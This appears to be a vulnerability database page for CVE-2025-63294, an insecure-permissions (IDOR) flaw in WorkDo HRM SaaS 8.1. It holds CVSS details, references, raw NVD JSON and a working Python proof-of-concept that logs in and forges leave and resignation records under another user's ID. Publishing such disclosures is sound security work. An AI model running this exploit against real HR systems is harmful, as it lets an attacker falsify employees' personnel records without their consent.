CVE-2025-63294

Description

WorkDo HRM SaaS HR and Payroll Tool 8.1 is affected vulnerable to Insecure Permissions. An authenticated user can create leave or resignation records on behalf of other users.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:workdo:hrm_saas:8.1:*:*:*:*:*:*:* - VULNERABLE

WorkDo HRM SaaS HR and Payroll Tool 8.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3 """ CVE-2025-63294 PoC - WorkDo HRM SaaS IDOR Vulnerability This PoC demonstrates the IDOR vulnerability in WorkDo HRM SaaS HR and Payroll Tool 8.1 """ import requests import json TARGET_URL = "https://vulnerable-workdo-instance.com" ATTACKER_USERNAME = "[email protected]" ATTACKER_PASSWORD = "attacker_password" VICTIM_USER_ID = "12345" # ID of the victim user def authenticate(): """Authenticate as the attacker user""" session = requests.Session() login_data = { "email": ATTACKER_USERNAME, "password": ATTACKER_PASSWORD } response = session.post(f"{TARGET_URL}/api/auth/login", json=login_data) if response.status_code == 200: return session else: raise Exception("Authentication failed") def create_leave_record_as_victim(session): """Create a leave record on behalf of the victim user""" # Original request would have attacker's user_id # We modify it to use the victim's user_id leave_data = { "user_id": VICTIM_USER_ID, # IDOR: Using victim's ID "leave_type": "annual", "start_date": "2025-12-01", "end_date": "2025-12-05", "reason": "Vacation" } headers = { "Content-Type": "application/json", "X-CSRF-Token": session.cookies.get("csrf_token") } response = session.post( f"{TARGET_URL}/api/leave/create", json=leave_data, headers=headers ) return response def create_resignation_record_as_victim(session): """Create a resignation record on behalf of the victim user""" resignation_data = { "user_id": VICTIM_USER_ID, # IDOR: Using victim's ID "resignation_date": "2025-12-31", "reason": "Personal reasons" } headers = { "Content-Type": "application/json", "X-CSRF-Token": session.cookies.get("csrf_token") } response = session.post( f"{TARGET_URL}/api/resignation/create", json=resignation_data, headers=headers ) return response def main(): print("[*] CVE-2025-63294 PoC - WorkDo HRM IDOR Vulnerability") print(f"[*] Target: {TARGET_URL}") print(f"[*] Victim User ID: {VICTIM_USER_ID}") try: # Step 1: Authenticate as attacker print("\n[1] Authenticating as attacker...") session = authenticate() print("[+] Authentication successful") # Step 2: Create leave record as victim print("\n[2] Creating leave record on behalf of victim...") response = create_leave_record_as_victim(session) if response.status_code in [200, 201]: print("[+] Leave record created successfully as victim") print(f" Response: {response.json()}") else: print(f"[-] Failed to create leave record: {response.status_code}") # Step 3: Create resignation record as victim print("\n[3] Creating resignation record on behalf of victim...") response = create_resignation_record_as_victim(session) if response.status_code in [200, 201]: print("[+] Resignation record created successfully as victim") print(f" Response: {response.json()}") else: print(f"[-] Failed to create resignation record: {response.status_code}") except Exception as e: print(f"[-] Error: {str(e)}") if __name__ == "__main__": main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63294
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63294
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63294/
[4] VulDB https://vuldb.com/cve/CVE-2025-63294
[5] https://codecanyon.net/item/hrm-saas-hr-and-payroll-tool/25982934
[6] https://medium.com/@barrattjack89/cve-2025-63294-insecure-permissions-in-workdo-hrm-saas-hr-and-payroll-8-1-d6bb03c21177
[7] https://workdo.io/hrm-saas-human-resource-management-software/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63294", "sourceIdentifier": "[email protected]", "published": "2025-11-04T16:16:01.090", "lastModified": "2026-02-04T20:15:04.680", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WorkDo HRM SaaS HR and Payroll Tool 8.1 is affected vulnerable to Insecure Permissions. An authenticated user can create leave or resignation records on behalf of other users."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:workdo:hrm_saas:8.1:*:*:*:*:*:*:*", "matchCriteriaId": "F2CA5F3C-FF7E-4ED7-8791-B57144BB6F27"}]}]}], "references": [{"url": "https://codecanyon.net/item/hrm-saas-hr-and-payroll-tool/25982934", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://medium.com/@barrattjack89/cve-2025-63294-insecure-permissions-in-workdo-hrm-saas-hr-and-payroll-8-1-d6bb03c21177", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://workdo.io/hrm-saas-human-resource-management-software/", "source": "[email protected]", "tags": ["Product"]}]}}